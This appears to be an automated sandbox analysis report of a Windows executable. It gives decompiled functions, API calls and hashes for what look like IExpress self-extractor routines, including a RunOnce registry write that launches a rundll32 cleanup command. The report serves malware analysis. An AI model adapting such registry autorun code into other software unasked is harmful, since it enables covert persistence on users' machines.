Instruction ID: 07f042ceb6dcc1c98cb5c7503a3be77a823d72fe07fa6cd629463af61211a0a4
Opcode Fuzzy Hash: 2371f76659e2f040ae2ecc5793c43dd7420d7622018ecf29542aacdc831cc701
Instruction Fuzzy Hash: 4031843024C201ABDB707A2DAC4DE2F3E64F7C9F55F40852AF6C19A698C67EC410CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01084224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E01084224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E010844B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x10888c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x10887a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x1088598;
					_v36 = 1;
					_v32 = E01084200;
					_v28 = 0x10888c0;
					 *0x108a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x108a288(_t32, 0x10888c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x10888c0 != 0) {
							E01081680(0x10887a0, 0x104, 0x10888c0);
						}
						 *0x108a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x10887a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x10888c0);
					_t61 = 0x10888c0;
					_t4 =  &(_t61[1]); // 0x10888c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x10888c0; // 0x2111181
					_t44 = CharPrevA(0x10888c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x10888c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x01084234
0x0108423c
0x01084240
0x010843b2
0x010843b7
0x010843c0
0x00000000
0x010843c5
0x0108424c
0x01084252
0x01084257
0x010843a4
0x010843a5
0x010843ab
0x00000000
0x010843ab
0x01084263
0x01084269
0x0108426e
0x00000000
0x00000000
0x0108427a
0x01084280
0x01084285
0x00000000
0x00000000
0x0108428d
0x01084293
0x010842e6
0x010842e9
0x010842ef
0x010842f4
0x010842f7
0x01084300
0x01084307
0x0108430e
0x01084315
0x0108431c
0x01084322
0x01084326
0x0108432d
0x0108432d
0x0108432f
0x01084334
0x01084343
0x01084349
0x0108434d
0x01084354
0x01084354
0x0108435d
0x0108436e
0x0108436e
0x0108437d
0x01084383
0x01084387
0x0108438e
0x0108438e
0x01084387
0x01084391
0x01084399
0x00000000
0x01084295
0x0108429f
0x010842a5
0x010842aa
0x010842aa
0x010842ad
0x010842ad
0x010842af
0x010842b0
0x010842b6
0x010842c2
0x010842c8
0x010842ce
0x010842e4
0x010842e4
0x00000000
0x010842ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 01084236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0108424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 01084263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0108427A
GetTempPathA.KERNEL32(00000104,010888C0,?,00000001), ref: 0108429F
CharPrevA.USER32(010888C0,02111181,?,00000001), ref: 010842C2
CharPrevA.USER32(010888C0,00000000,?,00000001), ref: 010842D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 01084391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010843A5

Strings

SHGetPathFromIDList, xrefs: 01084274
SHELL32.DLL, xrefs: 0108422F
SHBrowseForFolder, xrefs: 01084246

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 46363d309c228d24039acca0e3755618c5b0bc8441553e21cbc86183316b2f1a
Instruction ID: 0d025dc056be8e8c456911ec71ab9816be2442d1300d1bef6d59f75effe56637
Opcode Fuzzy Hash: 46363d309c228d24039acca0e3755618c5b0bc8441553e21cbc86183316b2f1a
Instruction Fuzzy Hash: A341EA74A0C215EFE761BF68E884B6E7FB5EB45344F4481ABEAC1E7245C7798801C760

Uniqueness

Uniqueness Score: -1.00%

Function 010844B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E010844B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x1088a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x1089a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E01081680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0108171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0108171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0108681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E010867C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0108681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E010867C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E01086CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x010844b9
0x010844c4
0x010844cb
0x010844d8
0x010844e4
0x010844eb
0x010844ee
0x010844ef
0x010844ef
0x010844f1
0x010844f7
0x010844f8
0x0108467b
0x010844fe
0x01084509
0x01084518
0x01084525
0x01084562
0x01084568
0x01084568
0x0108456b
0x0108456b
0x0108456d
0x0108456e
0x01084572
0x01084578
0x0108457c
0x010845cb
0x01084607
0x01084607
0x0108460d
0x01084613
0x01084617
0x00000000
0x0108461d
0x01084623
0x01084626
0x01084628
0x00000000
0x01084628
0x010845cd
0x010845cd
0x010845cf
0x010845cf
0x010845d2
0x010845d2
0x010845d4
0x010845d5
0x010845db
0x010845de
0x010845e3
0x010845e9
0x010845ed
0x00000000
0x010845f3
0x010845fd
0x00000000
0x01084602
0x010845ed
0x0108457e
0x0108457e
0x01084580
0x01084580
0x01084583
0x01084583
0x01084585
0x01084586
0x0108458a
0x0108458c
0x0108458f
0x0108458f
0x01084591
0x01084592
0x0108459b
0x0108459e
0x010845a3
0x010845a9
0x010845ad
0x00000000
0x010845af
0x010845af
0x010845bf
0x0108462d
0x01084630
0x0108463d
0x0108464e
0x0108464e
0x0108463f
0x01084640
0x01084647
0x0108464c
0x00000000
0x00000000
0x0108464c
0x01084666
0x0108466d
0x0108466f
0x01084675
0x01084675
0x010845ad
0x01084527
0x0108452e
0x0108453f
0x0108453f
0x01084530
0x01084531
0x01084538
0x0108453d
0x00000000
0x00000000
0x0108453d
0x01084554
0x0108455a
0x0108455a
0x0108455a
0x01084525
0x0108468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01084518
MessageBoxA.USER32(?,?,lenta,00010010), ref: 01084554
LocalAlloc.KERNEL32(00000040,00000065), ref: 010845A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 010845E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 0108460D
MessageBeep.USER32(00000000), ref: 01084630
MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 01084666
LocalFree.KERNEL32(00000000), ref: 0108466F

Part of subcall function 0108681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0108686E
Part of subcall function 0108681F: GetSystemMetrics.USER32(0000004A), ref: 010868A7
Part of subcall function 0108681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010868CC
Part of subcall function 0108681F: RegQueryValueExA.ADVAPI32(?,01081140,00000000,?,?,0000000C), ref: 010868F4
Part of subcall function 0108681F: RegCloseKey.ADVAPI32(?), ref: 01086902

Strings

LoadString() Error. Could not load string resource., xrefs: 010844E4
lenta, xrefs: 01084545, 0108465A

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$lenta
API String ID: 3244514340-1000497449
Opcode ID: 3acd50301936668deb8ddcb748f94e62bab8485f2b65a97ded664d02f4e09ae3
Instruction ID: 287419148cc1c0278daf629979360b7e7f8e157d2bbf03a833616ac5cc593c80
Opcode Fuzzy Hash: 3acd50301936668deb8ddcb748f94e62bab8485f2b65a97ded664d02f4e09ae3
Instruction Fuzzy Hash: 2651E671908216EFDB21BE28CC48BBE7BA8EF45304F014195EDC9E7245DB769905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01082773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E01082773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E01081781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0108658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0108658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x1081140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E01081680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E01086CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x01082773
0x0108277e
0x01082785
0x0108278a
0x0108278d
0x01082790
0x01082792
0x01082798
0x0108279d
0x010828b2
0x00000000
0x010827a3
0x010827a3
0x010827af
0x010827c2
0x010827c8
0x010827cd
0x010827d5
0x010828b7
0x010828b9
0x00000000
0x010827db
0x010827dd
0x010828aa
0x00000000
0x010827e3
0x010827e3
0x010827ec
0x010827f8
0x01082803
0x0108280b
0x01082831
0x010828c3
0x010828c9
0x010828cd
0x01082837
0x0108285a
0x0108285c
0x01082865
0x01082892
0x01082895
0x00000000
0x00000000
0x01082867
0x01082878
0x0108288c
0x00000000
0x0108287a
0x01082880
0x01082885
0x01082897
0x01082899
0x01082899
0x01082878
0x01082865
0x010828a0
0x010828bf
0x010828c1
0x00000000
0x00000000
0x010828c1
0x01082831
0x010827dd
0x010827d5
0x010828e5

APIs

CharUpperA.USER32(4F5B7A6C,00000000,00000000,00000000), ref: 010827A8
CharNextA.USER32(0000054D), ref: 010827B5
CharNextA.USER32(00000000), ref: 010827BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01082829
RegQueryValueExA.ADVAPI32(?,01081140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01082852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01082870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010828A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010828AA
GetSystemDirectoryA.KERNEL32 ref: 010828B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010827E4

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: f0490a7873a222aea9024022a3b7b3f3a12f488a145e36fff5dbd64a7273739b
Instruction ID: 8be95f3a27364f4338e7f63df77be1e74f477bdbe3a47a9ab1729ccf98d139e2
Opcode Fuzzy Hash: f0490a7873a222aea9024022a3b7b3f3a12f488a145e36fff5dbd64a7273739b
Instruction Fuzzy Hash: 00418171A19128EFDB65AA649C44AEE7BBDEB15700F0040AAF5C5D2104DB754E86CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01082267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E01082267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x1088004; // 0x4f5b7a6c
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x1088530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0108658A( &_v268, 0x104, 0x1081140);
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
							E0108171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E01086CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x01082272
0x01082277
0x01082279
0x01082283
0x01082289
0x010822ab
0x010822b1
0x010822c4
0x010822e0
0x010822e6
0x010822f5
0x0108230d
0x0108231c
0x0108231c
0x01082321
0x0108233a
0x01082342
0x01082348
0x0108234b
0x0108234c
0x0108234c
0x0108234e
0x0108234f
0x0108236e
0x0108236e
0x0108237a
0x01082380
0x01082380
0x01082381
0x01082381
0x0108238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010822A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 010822D8
memset.MSVCRT ref: 010822F5
GetSystemDirectoryA.KERNEL32 ref: 01082305
RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0108236E
RegCloseKey.ADVAPI32(?), ref: 0108237A

Strings

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0108232D
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01082299
wextract_cleanup1, xrefs: 0108227C, 010822CD, 01082363
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01082321

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
API String ID: 3027380567-1226499438
Opcode ID: 654d7fc4e1f04dd1b5d1f2b0a9d5605adf1763d7e3e3f86683d3ff9926beb596
Instruction ID: 727e9df3134ea86a62155625fb9d5b40a19789097fdc48c41b93039c735396dc
Opcode Fuzzy Hash: 654d7fc4e1f04dd1b5d1f2b0a9d5605adf1763d7e3e3f86683d3ff9926beb596
Instruction Fuzzy Hash: 8C31C871A08218ABDB71AB55DC48FEE7B7CEF55740F4001EAB5CDAA000D6756B85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01083100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E01083100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x1088590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x1088590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E010843D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x1088d4c);
					SetWindowTextA(_t33, "lenta");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x10888b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E010830C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x01083108
0x0108310b
0x010831b7
0x010831ca
0x010831d0
0x010831d0
0x010831da
0x00000000
0x010831da
0x01083111
0x01083114
0x01083136
0x01083136
0x01083138
0x0108313b
0x01083141
0x00000000
0x01083143
0x01083116
0x0108311b
0x0108314b
0x01083151
0x01083158
0x0108316a
0x01083176
0x0108317d
0x0108318b
0x0108319e
0x010831a3
0x00000000
0x010831ad
0x01083120
0x00000000
0x00000000
0x0108312a
0x01083134
0x00000000
0x00000000
0x00000000
0x01083134
0x0108312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 0108313B
GetDesktopWindow.USER32 ref: 0108314B
SetDlgItemTextA.USER32(?,00000834), ref: 0108316A
SetWindowTextA.USER32(?,lenta), ref: 01083176
SetForegroundWindow.USER32(?), ref: 0108317D
GetDlgItem.USER32(?,00000834), ref: 01083185
GetWindowLongA.USER32(00000000,000000FC), ref: 01083190
SetWindowLongA.USER32(00000000,000000FC,010830C0), ref: 010831A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010831CA

Strings

lenta, xrefs: 01083170

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: lenta
API String ID: 3785188418-2780258678
Opcode ID: 46087467369250c84b3b13feee5f6c9508a2402d6f2a895f7e58ee22d5255d6d
Instruction ID: 4bbf8cad01552bca0e098b6694e20079fd733050cd9678806addcc95644064a5
Opcode Fuzzy Hash: 46087467369250c84b3b13feee5f6c9508a2402d6f2a895f7e58ee22d5255d6d
Instruction Fuzzy Hash: DE119D3124C221FBDF316B28AC0CB9E3AB4BB8AF60F004612F9D59A584DB7AD141C754

Uniqueness

Uniqueness Score: -1.00%

Function 010818A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E010818A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t23 ^ _t53;
				_t25 =  *0x1088128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E01086CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E010817EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x1088128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x1088128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x010818a3
0x010818a3
0x010818ab
0x010818b2
0x010818b5
0x010818be
0x010818c0
0x010818c6
0x010818c7
0x010818ca
0x010818cf
0x010819c9
0x010819d8
0x010819d8
0x010818df
0x010819b8
0x010819bd
0x010819bf
